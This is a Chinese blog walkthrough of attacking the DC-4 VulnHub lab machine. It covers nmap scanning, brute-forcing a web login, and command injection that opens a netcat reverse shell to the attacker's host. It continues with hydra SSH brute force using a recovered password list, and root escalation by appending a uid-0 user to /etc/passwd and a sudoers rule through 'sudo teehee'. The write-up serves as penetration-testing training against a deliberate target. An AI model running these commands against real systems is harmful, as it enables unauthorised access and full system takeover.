DC-4靶机渗透

<h1 id="dc-4靶机渗透">DC-4靶机渗透</h1>

1. <code>靶机地址：https://www.vulnhub.com/entry/dc-4,313/
2. 难度：低
3. 目标：获得 root 权限
5. DC-4靶机是网络安全渗透测试中常见的虚拟靶机，主要用于模拟真实攻击场景。以下是基于多个来源的渗透测试流程总结：
7.    不同环境中靶机IP可能不同（如192.168.77.143、192.168.172.135），需根据实际扫描结果调整操作。
8.    部分步骤需结合:ml-search-more[Burp Suite]{text="Burp Suite"}抓包、修改请求参数等工具辅助完成。
9. </code>

复制代码

<h2 id="一主机发现">一.主机发现</h2>
<h2 id="nmap主机发现">nmap主机发现</h2>
<h3 id="1查看网段">1.查看网段</h3>

1. <code >ifconfig
3. eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
4.         inet 192.168.65.132  netmask 255.255.255.0  broadcast 192.168.65.255
5.         inet6 fe80::20c:29ff:fed4:313a  prefixlen 64  scopeid 0x20<link>
6.         ether 00:0c:29:d4:31:3a  txqueuelen 1000  (Ethernet)
7.         RX packets 9  bytes 1313 (1.2 KiB)
8.         RX errors 0  dropped 0  overruns 0  frame 0
9.         TX packets 24  bytes 4079 (3.9 KiB)
10.         TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
12. </code>

复制代码

<h3 id="2扫描ip">2.扫描ip</h3>

1. <code >└─# sudo nmap -sn 192.168.65.0/24
3. Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-26 05:17 EDT
4. Nmap scan report for 192.168.65.1
5. Host is up (0.00036s latency).
6. MAC Address: 00:50:56:C0:00:08 (VMware)
7. Nmap scan report for 192.168.65.2
8. Host is up (0.00023s latency).
9. MAC Address: 00:50:56:FA:BF:D8 (VMware)
10. Nmap scan report for 192.168.65.148
11. Host is up (0.00022s latency).
12. MAC Address: 00:0C:29:7A:03:D1 (VMware)
13. Nmap scan report for 192.168.65.254
14. Host is up (0.00020s latency).
15. MAC Address: 00:50:56:EB:5F:6C (VMware)
16. Nmap scan report for 192.168.65.132
17. Host is up.
18. Nmap done: 256 IP addresses (5 hosts up) scanned in 2.58 seconds
20. </code>

复制代码

<p>由于自己的主机的ip自己熟悉我们可以</p>

1. <code>192.168.65.148
2. </code>

复制代码

<h3 id="3扫描端口">3.扫描端口</h3>

1. <code > nmap -sT --min-rate 10000 -p- 192.168.65.148
3. Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-26 05:19 EDT
4. Nmap scan report for 192.168.65.148
5. Host is up (0.0010s latency).
6. Not shown: 65533 closed tcp ports (conn-refused)
7. PORT   STATE SERVICE
8. 22/tcp open  ssh
9. 80/tcp open  http
10. MAC Address: 00:0C:29:7A:03:D1 (VMware)
12. Nmap done: 1 IP address (1 host up) scanned in 8.11 seconds
14. </code>

复制代码

<p><strong>发现开放了22，80端口</strong></p>
<p><strong>TCP扫描</strong></p>

1. <code >nmap -sT -sV -sC -O -p80,22 192.168.65.148
2. Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-26 05:21 EDT
3. Nmap scan report for 192.168.65.148
4. Host is up (0.00053s latency).
6. PORT   STATE SERVICE VERSION
7. 22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
8. | ssh-hostkey:
9. |   2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
10. |   256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
11. |_  256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
12. 80/tcp open  http    nginx 1.15.10
13. |_http-title: System Tools
14. |_http-server-header: nginx/1.15.10
15. MAC Address: 00:0C:29:7A:03:D1 (VMware)
16. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
17. Device type: general purpose
18. Running: Linux 3.X|4.X
19. OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
20. OS details: Linux 3.2 - 4.9
21. Network Distance: 1 hop
22. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
24. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
25. Nmap done: 1 IP address (1 host up) scanned in 9.28 seconds
27. </code>

复制代码

<p><strong>UDP扫描</strong></p>

1. <code >nmap -sU --top-ports 20 192.168.65.148
2. Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-26 05:23 EDT
3. Nmap scan report for 192.168.65.148
4. Host is up (0.00042s latency).
6. PORT      STATE         SERVICE
7. 53/udp    closed        domain
8. 67/udp    closed        dhcps
9. 68/udp    open|filtered dhcpc
10. 69/udp    closed        tftp
11. 123/udp   closed        ntp
12. 135/udp   closed        msrpc
13. 137/udp   open|filtered netbios-ns
14. 138/udp   closed        netbios-dgm
15. 139/udp   open|filtered netbios-ssn
16. 161/udp   open|filtered snmp
17. 162/udp   closed        snmptrap
18. 445/udp   closed        microsoft-ds
19. 500/udp   open|filtered isakmp
20. 514/udp   closed        syslog
21. 520/udp   open|filtered route
22. 631/udp   open|filtered ipp
23. 1434/udp  open|filtered ms-sql-m
24. 1900/udp  open|filtered upnp
25. 4500/udp  closed        nat-t-ike
26. 49152/udp closed        unknown
27. MAC Address: 00:0C:29:7A:03:D1 (VMware)
29. Nmap done: 1 IP address (1 host up) scanned in 8.19 seconds
31. </code>

复制代码

<p><strong>默认脚本扫描</strong></p>

1. <code >nmap --script=vuln -p80 192.168.132.148
2. Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-26 05:25 EDT
3. Nmap scan report for 192.168.132.148
4. Host is up (0.00046s latency).
6. PORT   STATE    SERVICE
7. 80/tcp filtered http
9. Nmap done: 1 IP address (1 host up) scanned in 11.77 seconds
10.                                                               
11. </code>

复制代码

<h2 id="二web渗透">二.web渗透</h2>
<p><strong>浏览器访问</strong></p>
<p>

<img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210319641-131282067.png" alt="image-20251026172723969" loading="lazy">

</p>
<p><strong>发现登入框尝试字典爆破</strong></p>
<p>

<img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210320612-14908294.png" alt="image-20251026173430920" loading="lazy">

</p>
<h3 id="密码爆破">密码爆破</h3>
<p><strong>然后爆破密码使用自己的字典爆破密码，观察长度</strong></p>
<p>

<img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210321072-554888442.png" alt="image-20251026173555682" loading="lazy">

</p>
<p>发现密码</p>

1. <code>happy
2. </code>

复制代码

<p>

<img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210321360-1410990119.png" alt="image-20251026173715360" loading="lazy">

</p>
<p>登入成功好像可以执行命令</p>
<p>

<img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210321698-1693952084.png" alt="image-20251026173746987" loading="lazy">

</p>
<p>抓包修改查看/etc/passwd</p>
<p>

<img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210322063-1167692198.png" alt="image-20251026173859875" loading="lazy">

</p>

1. <code>charles:x:1001:1001:Charles,,,:/home/charles:/bin/bash
2. 这个有bash权限
3. </code>

复制代码

<h3 id="命令执行拿shell">命令执行拿shell</h3>
<p>我们尝试反弹shell</p>

1. <code>命令执行
2. nc 192.168.65.132 4444 -e /bin/bash
3. 接收
4. nc -lvnp 4444
6. </code>

复制代码

<p>

<img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210322454-1674748222.png" alt="image-20251026174253482" loading="lazy">

</p>
<p>成功反弹成功</p>
<p>提升交互性</p>

1. <code >python -c "import pty;pty.spawn('/bin/bash')"
2. </code>

复制代码

<p>简单查看文件</p>
<p>查看home目录</p>

1. <code>cd /home
2. </code>

复制代码

<p>

<img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210322883-239742851.png" alt="image-20251026174618100" loading="lazy">

</p>
<p>然后查看用户目录的内容</p>
<p>

<img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210323268-392189122.png" alt="image-20251026174803049" loading="lazy">

</p>
<p>发现在jim目录下的backups中发现旧密码</p>

1. <code >www-data@dc-4:/home/jim/backups$ ls
2. ls
3. old-passwords.bak
4. www-data@dc-4:/home/jim/backups$ cat old-passwords.bak
5. cat old-passwords.bak
6. 000000
7. 12345
8. iloveyou
9. 1q2w3e4r5t
10. 1234
11. 123456a
12. qwertyuiop
13. monkey
14. 123321
15. dragon
16. 654321
17. 666666
18. 123
19. myspace1
20. a123456
21. 121212
22. 1qaz2wsx
23. 123qwe
24. 123abc
25. tinkle
26. target123
27. gwerty
28. 1g2w3e4r
29. gwerty123
30. zag12wsx
31. 7777777
32. qwerty1
33. 1q2w3e4r
34. 987654321
35. 222222
36. qwe123
37. qwerty123
38. zxcvbnm
39. 555555
40. 112233
41. fuckyou
42. asdfghjkl
43. 12345a
44. 123123123
45. 1q2w3e
46. qazwsx
47. loveme1
48. juventus
49. jennifer1
50. !~!1
51. bubbles
52. samuel
53. fuckoff
54. lovers
55. cheese1
56. 0123456
57. 123asd
58. 999999999
59. madison
60. elizabeth1
61. music
62. buster1
63. lauren
64. david1
65. tigger1
66. 123qweasd
67. taylor1
68. carlos
69. tinkerbell
70. samantha1
71. Sojdlg123aljg
72. joshua1
73. poop
74. stella
75. myspace123
76. asdasd5
77. freedom1
78. whatever1
79. xxxxxx
80. 00000
81. valentina
82. a1b2c3
83. 741852963
84. austin
85. monica
86. qaz123
87. lovely1
88. music1
89. harley1
90. family1
91. spongebob1
92. steven
93. nirvana
94. 1234abcd
95. hellokitty
96. thomas1
97. cooper
98. 520520
99. muffin
100. christian1
101. love13
102. fucku2
103. arsenal1
104. lucky7
105. diablo
106. apples
107. george1
108. babyboy1
109. crystal
110. 1122334455
111. player1
112. aa123456
113. vfhbyf
114. forever1
115. Password
116. winston
117. chivas1
118. sexy
119. hockey1
120. 1a2b3c4d
121. pussy
122. playboy1
123. stalker
124. cherry
125. tweety
126. toyota
127. creative
128. gemini
129. pretty1
130. maverick
131. brittany1
132. nathan1
133. letmein1
134. cameron1
135. secret1
136. google1
137. heaven
138. martina
139. murphy
140. spongebob
141. uQA9Ebw445
142. fernando
143. pretty
144. startfinding
145. softball
146. dolphin1
147. fuckme
148. test123
149. qwerty1234
150. kobe24
151. alejandro
152. adrian
153. september
154. aaaaaa1
155. bubba1
156. isabella
157. abc123456
158. password3
159. jason1
160. abcdefg123
161. loveyou1
162. shannon
163. 100200
164. manuel
165. leonardo
166. molly1
167. flowers
168. 123456z
169. 007007
170. password.
171. 321321
172. miguel
173. samsung1
174. sergey
175. sweet1
176. abc1234
177. windows
178. qwert123
179. vfrcbv
180. poohbear
181. d123456
182. school1
183. badboy
184. 951753
185. 123456c
186. 111
187. steven1
188. snoopy1
189. garfield
190. YAgjecc826
191. compaq
192. candy1
193. sarah1
194. qwerty123456
195. 123456l
196. eminem1
197. 141414
198. 789789
199. maria
200. steelers
201. iloveme1
202. morgan1
203. winner
204. boomer
205. lolita
206. nastya
207. alexis1
208. carmen
209. angelo
210. nicholas1
211. portugal
212. precious
213. jackass1
214. jonathan1
215. yfnfif
216. bitch
217. tiffany
218. rabbit
219. rainbow1
220. angel123
221. popcorn
222. barbara
223. brandy
224. starwars1
225. barney
226. natalia
227. jibril04
228. hiphop
229. tiffany1
230. shorty
231. poohbear1
232. simone
233. albert
234. marlboro
235. hardcore
236. cowboys
237. sydney
238. alex
239. scorpio
240. 1234512345
241. q12345
242. qq123456
243. onelove
244. bond007
245. abcdefg1
246. eagles
247. crystal1
248. azertyuiop
249. winter
250. sexy12
251. angelina
252. james
253. svetlana
254. fatima
255. 123456k
256. icecream
257. popcorn1
259. </code>

复制代码

<p>将其复制保存为<strong>password.txt</strong></p>
<h3 id="使用hydra爆破">使用hydra爆破</h3>

1. <code >hydra ssh://192.168.65.148 -l jim -P password.txt -vV
2. </code>

复制代码

<p>

<img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210323622-638709950.png" alt="image-20251026180122239" loading="lazy">

</p>
<p>成功爆破</p>

1. <code>[22][ssh] host: 192.168.65.148   login: jim   password: jibril04
2. </code>

复制代码

<h3 id="ssh登录"><strong>ssh登录</strong></h3>

1. <code>ssh jim@192.168.65.148
3. </code>

复制代码

<p>

<img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210324006-2103683866.png" alt="image-20251026180337525" loading="lazy">

</p>

1. <code >然后说我有应该mail
2. 去看看
5. You have mail.
6. Last login: Sun Apr  7 02:23:55 2019 from 192.168.0.100
7. jim@dc-4:~$ ls
8. backups  mbox  test.sh
9. jim@dc-4:~$ cd /var/mail
10. jim@dc-4:/var/mail$ ls
11. jim
12. jim@dc-4:/var/mail$ cat jim
13. From charles@dc-4 Sat Apr 06 21:15:46 2019
14. Return-path: <charles@dc-4>
15. Envelope-to: jim@dc-4
16. Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
17. Received: from charles by dc-4 with local (Exim 4.89)
18.         (envelope-from <charles@dc-4>)
19.         id 1hCjIX-0000kO-Qt
20.         for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
21. To: jim@dc-4
22. Subject: Holidays
23. MIME-Version: 1.0
24. Content-Type: text/plain; charset="UTF-8"
25. Content-Transfer-Encoding: 8bit
26. Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
27. From: Charles <charles@dc-4>
28. Date: Sat, 06 Apr 2019 21:15:45 +1000
29. Status: O
31. Hi Jim,
33. I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.
35. Password is:  ^xHhA&hvim0y
37. See ya,
38. Charles
39. </code>

复制代码

<p>得到密码</p>

1. <code>Password is:  ^xHhA&hvim0y
3. See ya,
4. Charles
5. </code>

复制代码

1. <code>im@dc-4:/var/mail$ sudo -l
3. We trust you have received the usual lecture from the local System
4. Administrator. It usually boils down to these three things:
6.     #1) Respect the privacy of others.
7.     #2) Think before you type.
8.     #3) With great power comes great responsibility.
10. [sudo] password for jim:
11. Sorry, user jim may not run sudo on dc-4.
12. jim@dc-4:/var/mail$
13. </code>

复制代码

<p>没有sudo</p>
<h3 id="提权">提权</h3>

1. <code>只能使用
2. find / -perm -u=s -type f 2>/dev/null
3. </code>

复制代码

1. <code>在根目录 / 下递归查找所有文件（-type f）
2. **这些文件的权限中，**用户（owner）拥有 SUID 权限（-perm -u=s）
3. 并将所有错误输出（如权限拒绝）重定向到 /dev/null，即不显示错误信息（2>/dev/null）
5. </code>

复制代码

1. <code >jim@dc-4:/var/mail$ find / -perm -u=s -type f 2>/dev/null
2. /usr/bin/gpasswd
3. /usr/bin/chfn
4. /usr/bin/sudo
5. /usr/bin/chsh
6. /usr/bin/newgrp
7. /usr/bin/passwd
8. /usr/lib/eject/dmcrypt-get-device
9. /usr/lib/openssh/ssh-keysign
10. /usr/lib/dbus-1.0/dbus-daemon-launch-helper
11. /usr/sbin/exim4
12. /bin/mount
13. /bin/umount
14. /bin/su
15. /bin/ping
16. /home/jim/test.sh
18. </code>

复制代码

<p>

<img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210324535-267946719.png" alt="image-20251026181116087" loading="lazy">

</p>

1. <code>su可用
2. </code>

复制代码

<p>

<img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210324968-1942921237.png" alt="image-20251026181253556" loading="lazy">

</p>
<p>发现成功登入</p>
<p>

<img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210325344-1004865647.png" alt="image-20251026181334863" loading="lazy">

</p>
<p>然后直接提权就可以</p>

1. <code>echo "aa::0:0:::/bin/bash" I sudo teehee -a /etc/passwd
2. echo "aacc::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
3. </code>

复制代码

<h4 id="方法一teehee提权">方法一：teehee提权</h4>
<p>teehee 可以把写入文件内容并不覆盖文件原有内容，功能与tee命令相似</p>
<p>使用 udo -l 查看charles用户的权限，根据显示可以利用teehee来提权</p>
<p>

<img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210325685-668830447.png" alt="image-20251026205327164" loading="lazy">

</p>
<p>输入命令：echo "M1ke::0:0:::/bin.bash" | sudo teehee -a /etc/passwd</p>
<p>创建一个00用户，用户名为“M1ke”，追加到/etc/passwd 中</p>
<p>

<img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210326055-425567159.png" alt="image-20251026205402913" loading="lazy">

</p>
<p>切换倒“M1ke”用户便提权成功了</p>
<h4 id="方法二-sudoers提权">方法二 sudoers提权</h4>
<p>这种方法是根据b站一位UP主的视频学习的</p>
<p>先查看sudoers文件，复制该命令</p>
<p>

<img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210326380-191673642.png" alt="image-20251026205505171" loading="lazy">

</p>
<p>在charles 用户下输入命令:</p>
<p>echo "%charles ALL=(ALL:ALL) ALL" | sudo teehee -a /etc/sudoers</p>
<p>现在就将用户增加到了sudoers的权限中，密码还是原来charles的密码。</p>
<p>

<img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210326727-2087584331.png" alt="image-20251026205725530" loading="lazy">

</p>
<p>成功提权</p><br>来源：程序园用户自行投稿发布，如果侵权，请联系站长删除<br>免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！